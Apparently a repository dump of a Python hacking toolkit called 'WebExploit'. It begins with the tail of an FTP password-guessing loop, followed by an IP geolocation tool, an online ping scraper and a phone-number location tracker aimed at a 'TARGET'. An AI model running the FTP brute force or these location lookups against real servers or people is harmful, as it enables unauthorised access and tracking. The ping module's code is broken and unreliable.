SUCESSFULL !') 204 | t.sleep(1) 205 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}{green}INFO{nbold}{f.WHITE} server response msg: {bold}{green}[{log}]') 206 | break 207 | sys.exit(0) 208 | 209 | except ftplib.all_errors as FTP_error: 210 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{red}\'{username}{nbold}{white}\' Passowrd: {bold} \'{red}{password}{nbold}{white}\' {bold}{red} Not SUCESSFULL ! {nbold}{white} Because: {yellow}{bold}{FTP_error}') 211 | continue 212 | except KeyboardInterrupt: 213 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 214 | t.sleep(2) 215 | 216 | -------------------------------------------------------------------------------- /cores/history: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /cores/ipl.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | mji = ''' powered by 26 | ███▄ ▄███▓ ▄▄▄██▀▀ ██ 27 | ▓██▒▀█▀ ██▒ ▒██ ▒▓██ 28 | ▓██ ▓██░ ░██ ░▒██ 29 | ▒██ ▒██ ▓██▄██▓ ░██ 30 | ▒▒██▒ ░██▒ ▓███▒ ░██ 31 | ░░ ▒░ ░ ░ ▒▓▒▒░ ░▓ 32 | ░░ ░ ░ ▒ ░▒░ ▒ 33 | ░ ░ ░ ░ ░ ▒ 34 | ░ ░ ░ ░ ░ 35 | ''' 36 | try: 37 | import json 38 | import time as t 39 | import sys, os 40 | from colorama import Fore as f 41 | import requests as r 42 | from random import choice 43 | from fake_headers import Headers 44 | except: 45 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 46 | t.sleep(1) 47 | sys.exit() 48 | global my_ip 49 | my_ip = "Unknown [Can't Get Your Ip]" 50 | black = "\033[0;30m" 51 | red = "\033[0;31m" 52 | green = "\033[0;32m" 53 | brown = "\033[0;33m" 54 | blue = "\033[0;34m" 55 | purple = "\033[0;35m" 56 | cyan = "\033[0;36m" 57 | l_gray = "\033[0;37m" 58 | dark_gray = "\033[1;30m" 59 | l_red = "\033[1;31m" 60 | l_green = "\033[1;32m" 61 | yellow = "\033[1;33m" 62 | l_blue = "\033[1;34m" 63 | l_purple = "\033[1;35m" 64 | l_cyan = "\033[1;36m" 65 | l_white = "\033[1;37m" 66 | faint = "\033[2m" 67 | italic = "\033[3m" 68 | underline = "\033[4m" 69 | blink = "\033[5m" 70 | nefative = "\033[7m" 71 | cross = "\033[9m" 72 | ended = "\033[0m" 73 | bold = "\033[1m" 74 | nbold = "\033[0m" 75 | white = f.WHITE 76 | 77 | bnr = [''' 78 | ▪ ▄▄▄· ▄▄▌ 79 | ██ ▐█ ▄█ ██• 80 | ▐█· ██▀· ██ ▪ 81 | ▐█▌ ▐█▪·• ▐█▌ ▄ 82 | ▀▀▀ .▀ .▀▀▀ ''', ''' 83 | ██ ██▓███ ██▓ 84 | ▒▓██ ▓██░ ██ ▓██▒ 85 | ░▒██ ▓██░ ██▓▒ ▒██░ 86 | ░██ ▒██▄█▓▒ ▒ ▒██░ 87 | ░██ ▒██▒ ░ ░ ░██████ 88 | ░▓ ▒▓▒░ ░ ░ ░ ▒░▓ 89 | ▒ ░▒ ░ ░ ░ ▒ 90 | ▒ ░░ ░ ░ 91 | ░ ░ '''] 92 | 93 | def r_bnr(bnr): 94 | return choice(bnr) 95 | print(f'{bold}') 96 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 97 | t.sleep(2) 98 | print(f' {italic}From{ended} : ', end='') 99 | #create flush text [simple] 100 | print(f'{red}{bold}', end='', flush=True) 101 | print(f'{bold}W', end='', flush=True) 102 | t.sleep(0.5) 103 | print('e', end='', flush=True) 104 | t.sleep(0.7) 105 | print('b', end='', flush=True) 106 | t.sleep(0.4) 107 | print('E', end='', flush=True) 108 | t.sleep(0.1) 109 | print('x', end='', flush=True) 110 | t.sleep(0.2) 111 | print('p', end='', flush=True) 112 | t.sleep(0.3) 113 | print('l', end='', flush=True) 114 | t.sleep(0.4) 115 | print('o', end='', flush=True) 116 | t.sleep(0.5) 117 | print('i', end='', flush=True) 118 | t.sleep(1.5) 119 | print(f't{ended}', flush=True) 120 | 121 | nbold = "\033[0m" # tahe koskholi ! 122 | t.sleep(1) 123 | print(f'{white}{nbold}') 124 | try: 125 | my_ip = public = r.get("https://api.ipify.org").text 126 | except: 127 | pass 128 | print (f'\n {bold}{f.GREEN}[{f.WHITE}IPL{f.GREEN}]{f.WHITE}{f.RED} I.P.L{f.WHITE}{bold} IP{nbold} {bold}L{nbold}ocation{bold} T00L !{nbold}\n\n\n') 129 | t.sleep(3) 130 | while True: 131 | try: 132 | #my_ip = public = r.get("https://api.ipify.org").text 133 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}IpLocation{f.WHITE}] {bold}YOUR PUBLIC IP{nbold}{f.WHITE} >>> {bold}{my_ip}{nbold}\n') 134 | t.sleep(1) 135 | #print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}IpLocation{f.WHITE}] {bold}TARGET{nbold}{f.WHITE} >>> {bold}{address}{nbold}\n') 136 | t.sleep(3) 137 | address = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}I.P.L/{bold}IPL{white}{nbold}[{bold}{green}TARGET{white}{nbold}]{nbold}{f.WHITE} enter \'\IP v4 ADDRESS{nbold}\' [ex: 5.238.12.159]:#{f.GREEN}{bold} ') 138 | print(f'{nbold}') 139 | if address: 140 | ip = address 141 | f_url = (f'http://ip-api.com/json/{ip}?fields=status,message,continent,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query') 142 | #print (len(address)) 143 | if len(address) < 7: 144 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}I.P.L/{f.GREEN}IP{white}] {nbold}{f.CYAN} IP IS VERY {bold}SHORT{nbold}\n') 145 | continue 146 | t.sleep(1) 147 | else: 148 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}IpLocation{f.WHITE}] {bold}TARGET{nbold}{f.WHITE} >>> {bold}{address}{nbold}\n') 149 | t.sleep(1) 150 | break 151 | except KeyboardInterrupt: 152 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 153 | t.sleep(2) 154 | # break 155 | sys.exit(0) 156 | 157 | t.sleep(3) 158 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}I.P.L/{f.CYAN}CHECKER{f.WHITE}] CHECKING IP FOR VERYFYING [{bold}{green}{address}{nbold}{white}]\n') 159 | t.sleep(2) 160 | 161 | bytes = address.split(".") 162 | for ip_byte in bytes: 163 | if int(ip_byte) < 0 or int(ip_byte) > 255: 164 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}I.P.L/{f.GREEN}IP{white}] {nbold}{f.CYAN} {bold}IP IS NOT VALID {bold}{red}{address}{nbold}\n') 165 | t.sleep(1) 166 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}INFO{f.WHITE}{nbold}] EXITTING . . .') 167 | t.sleep(1) 168 | sys.exit() 169 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}I.P.L/{f.CYAN}CHECKER{f.WHITE}] {bold}IP VERIFIED {nbold}[{bold}{green}{address}{nbold}{white}]\n') 170 | 171 | #make request 172 | headers = Headers(browser='opera',os='win',headers=True).generate() 173 | response = r.get(f_url, headers=headers) 174 | 175 | response_js = response.text 176 | texts = json.loads(response_js) 177 | try: 178 | ip = texts['query'] 179 | status = texts['status'] 180 | continent = texts["continent"] 181 | #continentCode = texts['continentCode'] 182 | country = texts['country'] 183 | countryCode = texts['countryCode'] 184 | region = texts['region'] 185 | regionName = texts['regionName'] 186 | city = texts['city'] 187 | district = texts['district'] 188 | zipp = texts['zip'] 189 | lat = texts['lat'] 190 | lon = texts['lon'] 191 | timezone = texts['timezone'] 192 | offset = texts['offset'] 193 | currency = texts['currency'] 194 | isp = texts['isp'] 195 | org = texts['org'] 196 | As = texts['as'] 197 | except: 198 | pass 199 | #if 'as' in rjs: 200 | for results in texts: 201 | 202 | print (f'\n\n {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}STATUS{nbold}{f.WHITE} >>> {bold}{green}{bold}{status}{nbold}') 203 | t.sleep(0.5) 204 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}IP{nbold}{f.WHITE} >>> {bold}{green}{bold}{ip}{nbold}') 205 | t.sleep(0.5) 206 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}country{nbold}{f.WHITE} >>> {bold}{green}{bold}{country}{nbold}') 207 | t.sleep(0.3) 208 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}region{nbold}{f.WHITE} >>> {bold}{green}{bold}{region}{nbold}') 209 | t.sleep(0.5) 210 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}countryCode{nbold}{f.WHITE} >>> {bold}{green}{bold}{countryCode}{nbold}') 211 | t.sleep(0.5) 212 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}CONTINENT{nbold}{f.WHITE} >>> {bold}{green}{bold}{continent}{nbold}') 213 | t.sleep(0.3) 214 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}REGION-NAME{nbold}{f.WHITE} >>> {bold}{green}{bold}{regionName}{nbold}') 215 | t.sleep(0.5) 216 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}CITY{nbold}{f.WHITE} >>> {bold}{green}{bold}{city}{nbold}') 217 | t.sleep(0.5) 218 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}DISTRICT{nbold}{f.WHITE} >>> {bold}{green}{bold}{district}{nbold}') 219 | t.sleep(0.5) 220 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ZIP{nbold}{f.WHITE} >>> {bold}{green}{bold}{zipp}{nbold}') 221 | t.sleep(0.5) 222 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LATITUDE{nbold}{f.WHITE} >>> {bold}{green}{bold}{lat}{nbold}') 223 | t.sleep(0.5) 224 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LONG-TITUDE{nbold}{f.WHITE} >>> {bold}{green}{bold}{lon}{nbold}') 225 | t.sleep(0.5) 226 | #print (f' {f.WHITE}[{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}zipp{nbold}{f.WHITE} >>> {green}{zipp}{nbold}\n') 227 | t.sleep(0.5) 228 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{nbold}{f.WHITE}] {white}{bold}TIME-ZONE{nbold}{f.WHITE} >>> {bold}{green}{bold}{timezone}{nbold}') 229 | t.sleep(0.5) 230 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}OFFSET{nbold}{f.WHITE} >>> {bold}{green}{bold}{offset}{nbold}') 231 | t.sleep(0.5) 232 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}CURRENCY{nbold}{f.WHITE} >>> {bold}{green}{bold}{currency}{nbold}') 233 | t.sleep(0.5) 234 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ISP{nbold}{f.WHITE} >>> {bold}{green}{bold}{isp}{nbold}') 235 | t.sleep(0.5) 236 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ORG{nbold}{f.WHITE} >>> {bold}{green}{bold}{org}{nbold}') 237 | t.sleep(0.5) 238 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}AS{nbold}{f.WHITE} >>> {bold}{green}{bold}{As}{nbold}') 239 | t.sleep(0.5) 240 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}GOOGLE-MAP{nbold}{f.WHITE} >>> {bold}{green}{bold}http://www.google.com/maps/place/{lat},{lon}/@{lat},{lon},16z {nbold} ') 241 | t.sleep(0.5) 242 | break 243 | 244 | 245 | 246 | -------------------------------------------------------------------------------- /cores/ping.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | try: 26 | import time as t 27 | from colorama import Fore as f 28 | import sys, os 29 | from random import choice 30 | from bs4 import BeautifulSoup as bs 31 | import json 32 | import requests as r 33 | #r = requests.Session() 34 | except: 35 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 36 | t.sleep(1) 37 | sys.exit() 38 | 39 | black = "\033[0;30m" 40 | red = "\033[0;31m" 41 | green = "\033[0;32m" 42 | brown = "\033[0;33m" 43 | blue = "\033[0;34m" 44 | purple = "\033[0;35m" 45 | cyan = "\033[0;36m" 46 | l_gray = "\033[0;37m" 47 | dark_gray = "\033[1;30m" 48 | l_red = "\033[1;31m" 49 | l_green = "\033[1;32m" 50 | yellow = "\033[1;33m" 51 | l_blue = "\033[1;34m" 52 | l_purple = "\033[1;35m" 53 | l_cyan = "\033[1;36m" 54 | l_white = "\033[1;37m" 55 | faint = "\033[2m" 56 | italic = "\033[3m" 57 | underline = "\033[4m" 58 | blink = "\033[5m" 59 | nefative = "\033[7m" 60 | cross = "\033[9m" 61 | ended = "\033[0m" 62 | bold = "\033[1m" 63 | nbold = "\033[0m" 64 | white = f.WHITE 65 | 66 | bnr = [''' 67 | ▄████▄ █████ ▄▄▄▄ 68 | ▒██▀ ▀█ ▓██ ▓█████▄ 69 | ▒▓█ ▄ ▒████ ▒██▒ ▄██ 70 | ▒▓▓▄ ▄██ ░▓█▒ ▒██░█▀ 71 | ▒ ▓███▀ ▒░▒█░ ▒░▓█ ▀█▓ 72 | ░ ░▒ ▒ ░ ▒ ░ ░░▒▓███▀▒ 73 | ░ ▒ ░ ░ ░▒░▒ ░ 74 | ░ ░ ░ ░ ░ 75 | ░ ░ ░ ░ ░ ''', ''' 76 | ▄▄· ·▄▄▄ ▄▄▄▄· 77 | ▐█ ▌▪ █ · ▐█ ▀█▪ 78 | ██ ▄▄ █▀▀▪ ▐█▀▀█▄ 79 | ▐███▌ ██ . ██▄▪▐█ 80 | ·▀▀▀ ▀▀▀ ·▀▀▀▀ '''] 81 | 82 | def r_bnr(bnr): 83 | return choice(bnr) 84 | 85 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 86 | t.sleep(2) 87 | print(f' {italic}From{ended} : ', end='') 88 | #create flush text [simple] 89 | print(f'{red}{bold}', end='', flush=True) 90 | print(f'{bold}W', end='', flush=True) 91 | t.sleep(0.5) 92 | print('e', end='', flush=True) 93 | t.sleep(0.7) 94 | print('b', end='', flush=True) 95 | t.sleep(0.4) 96 | print('E', end='', flush=True) 97 | t.sleep(0.1) 98 | print('x', end='', flush=True) 99 | t.sleep(0.2) 100 | print('p', end='', flush=True) 101 | t.sleep(0.3) 102 | print('l', end='', flush=True) 103 | t.sleep(0.4) 104 | print('o', end='', flush=True) 105 | t.sleep(0.5) 106 | print('i', end='', flush=True) 107 | t.sleep(1.5) 108 | print(f't{ended}', flush=True) 109 | nbold = "\033[0m" # tahe koskholi ! 110 | t.sleep(1) 111 | ping = 'https://www.broadbandsearch.net/network-tools/ping' 112 | print(f'{white}{nbold}') 113 | 114 | print (f'\n {bold}{f.GREEN}[{f.WHITE}P.I.N.G-online{f.GREEN}]{f.WHITE}{f.RED} P.I.N.G{f.WHITE}{bold} ONLINE PING TOOL {nbold} T00L !\n\n\n') 115 | t.sleep(3) 116 | 117 | 118 | while True: 119 | try: 120 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}P.I.N.G/{bold}URL{nbold}{f.WHITE} enter \'{bold}URL or IP{nbold}\' [ex: youtube.com | 1.1.1.1]:#{f.GREEN}{bold} ') 121 | print(f'{nbold}') 122 | 123 | if url: 124 | if 'http' not in url: 125 | break 126 | if 'https://' not in url: 127 | break 128 | else: 129 | print(f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] ENTER URL WITHOUT {bold}HTTP:// OR HTTPS://{nbold} TRY AGAIN . . .\n') 130 | t.sleep(1) 131 | continue 132 | else: 133 | continue 134 | except KeyboardInterrupt: 135 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 136 | t.sleep(2) 137 | # break 138 | sys.exit(0) 139 | finally: 140 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}PING/{f.WHITE}URL >>>{bold}{f.CYAN} {url} {nbold}{f.WHITE}] \n') 141 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}PING/{f.CYAN}STATUS{f.WHITE}] Try Requesting . . . {bold}{f.YELLOW} Please Wait{nbold} . . .\n') 142 | t.sleep(2) 143 | d = 'domain=$' 144 | data = d.replace('$',url) 145 | #data = {'domain':'1.1.1.1'} 146 | 147 | hed = {'Host': 'www.broadbandsearch.net', 148 | 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0', 149 | 'Accept': '*/*', 150 | 'Accept-Language': 'en-US,en;q=0.5', 151 | 'Accept-Encoding': 'gzip, deflate, br', 152 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 153 | 'X-Requested-With': 'XMLHttpRequest', 154 | 'Content-Length': '16', 155 | 'Origin': 'https://www.broadbandsearch.net', 156 | 'Connection': 'keep-alive', 157 | 'Cookie': '_ga_F8CJ2KC6JR=GS1.1.1673472546.1.1.1673472850.0.0.0; _ga=GA1.2.638612145.1673472546; __gads=ID=6f95f94f84659bb4-22c69e6f4cd8002f:T=1673472550:RT=1673472550:S=ALNI_MaoiRZ2kMjsMTDYg7KJlYKFQ0UEyQ; __gpi=UID=00000bbff5daf570:T=1673472550:RT=1673472550:S=ALNI_MZ84xWSr3jUcf5vm7IqTGX4F7IhAQ; _gid=GA1.2.2145156682.1673472547', 158 | 'Sec-Fetch-Dest': 'empty', 159 | 'Sec-Fetch-Mode': 'cors', 160 | 'Sec-Fetch-Site': 'same-origin'} 161 | 162 | while True: 163 | try: 164 | ping_data = r.post(ping, headers=hed, data=data) 165 | if ping_data: 166 | break 167 | else: 168 | continue 169 | except Exception as error: 170 | print (f' {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}PING/{f.GREEN}REQUEST-ERROR{white}] {nbold}{f.RED} ERROR :{white}\'{red}{bold}{error}{nbold}\' | Requesting Again . . . \n') 171 | continue 172 | except KeyboardInterrupt: 173 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 174 | t.sleep(2) 175 | # break 176 | sys.exit(0) 177 | 178 | 179 | 180 | data_text = ping_data.text 181 | #ping_ = data_text.replace('
', '\n') 182 | 183 | 184 | 185 | da = bs(data_text, 'html.parser') 186 | 187 | data = bs(data_text, 'html.parser') 188 | print(da) 189 | test, status = data.find_all('p') 190 | d = '' 191 | d = da.replace('

','\n') 192 | dd = d.replace('','\t\t\n') 193 | ddd = dd.replace('
','\t\t\n') 194 | dddd = dddd.replace('
','\t\t\n') 195 | print(dddd) 196 | 197 | 198 | data_json = json.loads(dddd) 199 | final = data_json['data'] 200 | 201 | t.sleep(1) 202 | 203 | test = test.text 204 | status = status.text 205 | 206 | 207 | 208 | print (f' {f.WHITE}[{f.WHITE}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}PING/{f.WHITE}STATUS >>>{bold}{f.GREEN} {status} {nbold}{f.WHITE}] \n\n') 209 | t.sleep(3) 210 | print (f' {f.WHITE}[{f.WHITE}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}PING/{f.WHITE}STATUS: {bold}{f.BLUE} {final} {nbold}{f.WHITE}] \n\n') 211 | t.sleep(2) 212 | print (f' {f.WHITE}[{f.WHITE}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}PING/{f.WHITE}STATUS >>>{bold}{f.CYAN} {test} {nbold}{f.WHITE}]\n') 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | -------------------------------------------------------------------------------- /cores/pnt.py: -------------------------------------------------------------------------------- 1 | 2 | def run(): 3 | ''' 4 | 'MJI 3> M' 5 | _____________ 6 | MIT License 7 | 8 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 9 | 10 | Permission is hereby granted, free of charge, to any person obtaining a copy 11 | of this software and associated documentation files (the "Software"), to deal 12 | in the Software without restriction, including without limitation the rights 13 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 14 | copies of the Software, and to permit persons to whom the Software is 15 | furnished to do so, subject to the following conditions: 16 | 17 | The above copyright notice and this permission notice shall be included in all 18 | copies or substantial portions of the Software. 19 | 20 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 21 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 22 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 23 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 24 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 25 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 26 | SOFTWARE. 27 | ''' 28 | from sys import argv, exit 29 | import time as t 30 | from colorama import Fore as f 31 | from random import choice 32 | import phonenumbers 33 | from phonenumbers import carrier, geocoder, timezone 34 | 35 | black = "\033[0;30m" 36 | red = "\033[0;31m" 37 | green = "\033[0;32m" 38 | brown = "\033[0;33m" 39 | blue = "\033[0;34m" 40 | purple = "\033[0;35m" 41 | cyan = "\033[0;36m" 42 | l_gray = "\033[0;37m" 43 | dark_gray = "\033[1;30m" 44 | l_red = "\033[1;31m" 45 | l_green = "\033[1;32m" 46 | yellow = "\033[1;33m" 47 | l_blue = "\033[1;34m" 48 | l_purple = "\033[1;35m" 49 | l_cyan = "\033[1;36m" 50 | l_white = "\033[1;37m" 51 | faint = "\033[2m" 52 | italic = "\033[3m" 53 | underline = "\033[4m" 54 | blink = "\033[5m" 55 | nefative = "\033[7m" 56 | cross = "\033[9m" 57 | ended = "\033[0m" 58 | bold = "\033[1m" 59 | nbold = "\033[0m" 60 | white = f.WHITE 61 | bnr = [""] 62 | def r_bnr(bnr): 63 | return choice(bnr) 64 | print(f'{bold}') 65 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 66 | t.sleep(2) 67 | print(f' {italic}From{ended} : ', end='') 68 | print(f'{red}{bold}', end='', flush=True) 69 | #create flush text [simple] 70 | print(f'{bold}W', end='', flush=True) 71 | t.sleep(0.5) 72 | print('e', end='', flush=True) 73 | t.sleep(0.7) 74 | print('b', end='', flush=True) 75 | t.sleep(0.4) 76 | print('E', end='', flush=True) 77 | t.sleep(0.1) 78 | print('x', end='', flush=True) 79 | t.sleep(0.2) 80 | print('p', end='', flush=True) 81 | t.sleep(0.3) 82 | print('l', end='', flush=True) 83 | t.sleep(0.4) 84 | print('o', end='', flush=True) 85 | t.sleep(0.5) 86 | print('i', end='', flush=True) 87 | t.sleep(1.5) 88 | print(f't{ended}', flush=True) 89 | nbold = "\033[0m" # tahe koskholi ! 90 | t.sleep(1) 91 | print (f'\n {bold}{f.GREEN}[{f.WHITE}PLT{f.GREEN}]{f.WHITE}{f.RED} P.L.T{f.WHITE}{bold} P{nbold}honeNnumber{nbold}L{bold}ocation{bold} T{nbold}racker{nbold}\n\n\n') 92 | t.sleep(3) 93 | 94 | phoneNumber : str = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}P.N.T/{bold}Phonenumber-Location-Tracker{nbold}{f.WHITE} enter \'PHONE-{bold}NUMBER{nbold}\' | (ex: +447387384578):#{f.GREEN}{bold} ') 95 | Region : str = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}P.N.T/{bold}Region-{bold}NUMBER{nbold}\' | (ex: IR, US, IN, or ....):#{f.GREEN}{bold} ') 96 | Number : str = phonenumbers.parse(phoneNumber, Region) 97 | regionCode : str = phonenumbers.region_code_for_number(Number) 98 | provider : str = carrier.name_for_number(Number, "en") 99 | loc : str = geocoder.description_for_number(Number, "id") 100 | isValid : str = phonenumbers.is_valid_number(Number) 101 | isPossible : str = phonenumbers.is_possible_number(Number) 102 | formattedNum : str = phonenumbers.format_number(Number, phonenumbers.PhoneNumberFormat.INTERNATIONAL) 103 | formattedNumMobile : str = phonenumbers.format_number_for_mobile_dialing(Number, Region,with_formatting=True) 104 | numberType : str = phonenumbers.number_type(Number) 105 | timezone1 : str = timezone.time_zones_for_number(Number) 106 | timezoneM : str = ', '.join(timezone1) 107 | 108 | def phoneDetector() -> str: 109 | if numberType == phonenumbers.PhoneNumberType.MOBILE: 110 | return "mobile number" 111 | elif numberType == phonenumbers.PhoneNumberType.FIXED_LINE: 112 | return "fixed line number" 113 | else: 114 | return "another type of number" 115 | 116 | 117 | print (f'\n\n {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}Location{nbold}{f.WHITE} >>> {bold}{green}{bold}{loc}{nbold}') 118 | t.sleep(0.5) 119 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}RegionCode{nbold}{f.WHITE} >>> {bold}{green}{bold}{regionCode}{nbold}') 120 | t.sleep(0.5) 121 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}TimeZone{nbold}{f.WHITE} >>> {bold}{green}{bold}{timezoneM}{nbold}') 122 | t.sleep(0.3) 123 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}Operator{nbold}{f.WHITE} >>> {bold}{green}{bold}{provider}{nbold}') 124 | t.sleep(0.5) 125 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ValidNumber{nbold}{f.WHITE} >>> 